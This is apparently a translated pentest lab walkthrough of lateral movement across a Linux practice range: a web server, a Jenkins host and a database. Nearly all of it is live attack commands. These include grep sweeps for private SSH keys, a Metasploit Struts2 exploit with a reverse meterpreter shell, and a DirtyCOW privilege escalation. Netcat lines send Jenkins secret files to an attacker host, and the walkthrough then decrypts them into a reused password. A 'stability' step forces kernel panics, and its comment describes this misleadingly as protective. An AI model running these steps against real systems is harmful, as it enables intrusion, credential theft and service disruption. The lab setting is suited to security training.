Article directory
chapter point
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH, Exchange, LLMNR poisoning, NTLM-Relay, Kerberos_TGS, GPO&DACL, domain control privilege escalation vulnerability, constrained delegation, database attack and defense, system patch distribution and execution, EDR targeted distribution and execution, etc.
Linux shooting range construction
Lateral Movement - Linux Range - SSH Protocol & RSA Key Credentials
~/.ssh/config
~/.ssh/known_hosts
~/.bash_history
Under normal circumstances, the SSH key is stored in the ~/.ssh/ directory, and the saved SSH certificate can also be searched in the file
grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
Reference: https://www.runoob.com/w3cnote/set-ssh-login-key.html
Lateral Movement - Linux Range - Privilege Escalation & SSH & Keys & Jenkins, etc.
Kali can only communicate with the same LAN as web (172.16.250.10)
1. Web DMZ permission acquisition
Information collection:
nmap 172.16.250.0/24
172.16.250.10 80 open
/struts2-showcase
exploits:
msfconsole
use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lport 80
run
Privilege escalation:
curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c
upload /root/dirtycow-mem.c /tmp
shell
gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
python3 -c "import pty;pty.spawn('/bin/bash')" #转化为有交互式的tty窗口
./dirtycow-mem
Continued stability:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs #将写回脏页面的间隔时间设置为0秒。这意味着如果有脏页面需要写回,内核会立即进行写回操作,而不等待指定的时间间隔。
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn #将Linux内核的系统崩溃(panic)功能打开,并启用不同类型的崩溃触发器。这样,在出现严重问题时,内核会自动崩溃并停止系统运行。这有助于避免数据损坏和其他可能的问题。
Lateral movement:
cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties #查看数据库配置文件 站库分离模式
View historical commands to get some information
Try to access
cat ~/.bash_history
cp ~/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa
download /tmp/id_rsa /root/id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
2. Jenkins DMZ permission acquisition
Information collection:
getuid
netstat -anpt
172.16.250.30 8080 open
to establish a node:
use auxiliary/server/socks_proxy
vim /etc/proxychains4.conf
Note here:
dynamic_chain: if one of the proxy nodes below is tested correctly, you can also use
strict_chain: if multiple nodes are set up below, you must test all of them correctly before you can use
172.16.250.30 8080 to open the jenkins service
proxychains firefox
Attack Jenkins:
Use nc to transfer the file in reverse. If you want 50 to go online through 30, you need to encapsulate the traffic into an ssh channel, because 10 can access port 22 of 30.
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml
crack key:
https://github.com/cheetz/jenkins-decrypt
python decrypt.py master.key hudson.util.Secret credentials.xml
Note that a low version of python3 is required for normal decryption and use
The password after successful decryption is:)uDvra{4UL^;r?*h
Use the cryptographic key of the jenkins service above 30 for lateral movement
3. Database DMZ permission acquisition
Password horizontal:
ssh [email protected]
)uDvra{4UL^;r?*h
Privilege escalation:
getuid
sudo su